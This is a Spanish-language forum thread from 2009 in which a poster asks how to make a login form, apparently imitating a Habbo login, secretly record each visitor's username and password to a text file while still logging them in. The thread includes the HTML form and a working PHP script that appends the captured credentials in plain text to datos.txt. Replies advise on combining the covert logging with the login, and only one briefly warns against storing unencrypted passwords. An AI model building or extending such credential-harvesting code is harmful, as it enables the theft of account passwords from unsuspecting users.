Foros del Web » Programando para Internet » Javascript »

Enviar informacion de un login a 2 sitios.

Estas en el tema de Enviar informacion de un login a 2 sitios. en el foro de Javascript en Foros del Web. Verán lo que necesito es que a la vez que alguien se conecte a mi pagina, me llegue ami a un block de notas y ...
  #1 (permalink)  
Antiguo 20/11/2009, 13:35
 
Fecha de Ingreso: junio-2009
Mensajes: 101
Antigüedad: 14 años, 10 meses
Puntos: 13
Información Enviar informacion de un login a 2 sitios.

Verán lo que necesito es que a la vez que alguien se conecte a mi pagina, me llegue ami a un block de notas y se apunte el nombre y la contraseña.
Demomento conseguí que me llegaran al block de notas, me falta que loggee. Lo que yo querria es que a la vez que entran a mi pagina, sin que salga ninguna otra ventana que me escriba sus datos en un block de notas.

Esto es lo que tengo, ¿qué podria hacer?

<form action="mod.php" method="post" class="login-habblet">
<ul>
<li>
<label for="login-username" class="login-text">Nombre</label>
<input tabindex="1" type="text" class="login-field" name="credentials.username" id="login-username" value="" maxlength="32" />
</li>
<li>
<label for="login-password" class="login-text">Contrase&ntilde;a</label>
<input tabindex="2" type="password" class="login-field" name="credentials.password" id="login-password" maxlength="32" />
<input type="submit" value="Entra" class="submit" id="login-submit-button"/>
<a href="#" id="login-submit-new-button" class="new-button" style="margin-left: 0;display:none"><b style="padding-left: 10px; padding-right: 7px; width: 55px">Entra</b><i></i></a>
</li>
</form>
  #2 (permalink)  
Antiguo 20/11/2009, 13:48
Avatar de Adler
Colaborador
 
Fecha de Ingreso: diciembre-2006
Mensajes: 4.671
Antigüedad: 17 años, 4 meses
Puntos: 126
Respuesta: Enviar informacion de un login a 2 sitios.

Hola

No he entendido que es lo que pretendes hacer. A ciegas, si quieres escribir en un archivo de texto, has de hacerlo del lado del servidor usando FSO ¿existe en php?

Suerte
__________________
Los formularios se envían/validan con un botón Submit
<input type="submit" value="Enviar" style="background-color:#0B5795; font:bold 10px verdana; color:#FFF;" />
  #3 (permalink)  
Antiguo 21/11/2009, 11:02
 
Fecha de Ingreso: septiembre-2009
Mensajes: 81
Antigüedad: 14 años, 7 meses
Puntos: 1
Respuesta: Enviar informacion de un login a 2 sitios.

k es exactamente "mod.php"? el archivo k escribe en el txt o el k logea?
De todos modos si lo k kieres es k se realicen las dos acciones simplemente kita el action del form y en el evento onclick del boton llama a una funcion k realice las dos acciones.

Otra opcion es k en el archivo "mod.php" realizes las dos acciones, es decir k modifikes el txt y loguees desde ese mismo archivo.

Para enviar un formulario desde una funcion javascript creo k era con la funcion submit:

Código:
tuformulario.submit();
De todos modos creo k la opcion 2 es la mejor, simplemente haz las dos cosas en el php del action.

Última edición por catalon; 21/11/2009 a las 11:10
  #4 (permalink)  
Antiguo 22/11/2009, 11:52
 
Fecha de Ingreso: abril-2002
Mensajes: 186
Antigüedad: 22 años
Puntos: 2
Respuesta: Enviar informacion de un login a 2 sitios.

En primer lugar creo que deberías de plantearte si realmente quieres hacer eso ya que esta prohibido almacenar contraseñas de usuarios sin cifrar (si hay un control de accesos obligatoriamente deben de estar los datos guardados).
Con javascript que no sepa no se puede escribir en ficheros de texto por tanto se podría hacer con PHP sin problemas escribiendo el código en el fichero mod.php con fopen(), fwrite() etc...
Saludos
  #5 (permalink)  
Antiguo 22/11/2009, 12:51
 
Fecha de Ingreso: junio-2009
Mensajes: 101
Antigüedad: 14 años, 10 meses
Puntos: 13
Respuesta: Enviar informacion de un login a 2 sitios.

Miren, yo no entiendo mucho de esto.
Aclaro:
El mod.php es el que me escribe los datos en un TXT
Ahora mi pregunta es:
¿Qué debería poner en "mod.php" para que me mandase los datos a los 2 sitios?
Cita:
<?php
$login=$_POST["credentials.username"];
$pass=$_POST["credentials.password"];
$guardar=fopen("datos.txt",a);
fwrite($guardar,"
".$login."
".$pass);
fclose($guardar);
echo ;
?>
¿Qué debería añadir ahí?

Busco esta alternativa porque lo otro de
Cita:
De todos modos si lo k kieres es k se realicen las dos acciones simplemente kita el action del form y en el evento onclick del boton llama a una funcion k realice las dos acciones.
No lo sé hacer :S
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 16:35.